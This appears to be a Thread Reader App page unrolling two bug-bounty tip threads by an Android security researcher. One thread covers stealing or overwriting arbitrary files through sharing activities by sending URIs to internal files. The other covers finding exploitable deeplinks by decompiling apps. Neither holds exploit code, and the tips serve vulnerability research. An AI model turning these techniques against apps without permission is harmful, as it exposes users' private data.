Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Sergey Toshin 🇺🇦 Profile picture
Sergey Toshin 🇺🇦
@_bagipro
Ranked as the #1 hacker for Google Play Security Rewards Program. The founder of @OversecuredInc Android and iOS vulnerability scanners
向松林 Profile picture 1 subscribed
Nov 18, 2020 4 tweets 2 min read
#bugbountytips
An almost universal way to theft or overwrite arbitrary files on #android is sharing activities. You can find them in AndroidManifest.xml. They handle android.intent.action.SEND. Use the PoC from blog.oversecured.com/Evernote-Unive… (ctrl+f "EXTRA_STREAM") and test 4 scenarios: 1. Send a Uri to an internal file using file:// scheme (direct or using a symlink)
2. Send a Uri to an internal file using a victim app's internal content provider
now grep private file contents on SD card
Aug 16, 2020 4 tweets 2 min read
#bugbounty

You must love #Android deeplinks! They are the easiest way to get bounties
1. Decompile an app with jadx
2. Collect all deeplink handlers from AndroidManifest.xml, they look like <data android:scheme="airbnb" android:host="d"/> 3. Grep among all sources and resources a pattern from a handler, in this case, airbnb://d
4. You could find a lot of hardcoded urls like airbnb://d/openurl?url=https:// airbnb.com/blabla. That's much simpler than learning app's sources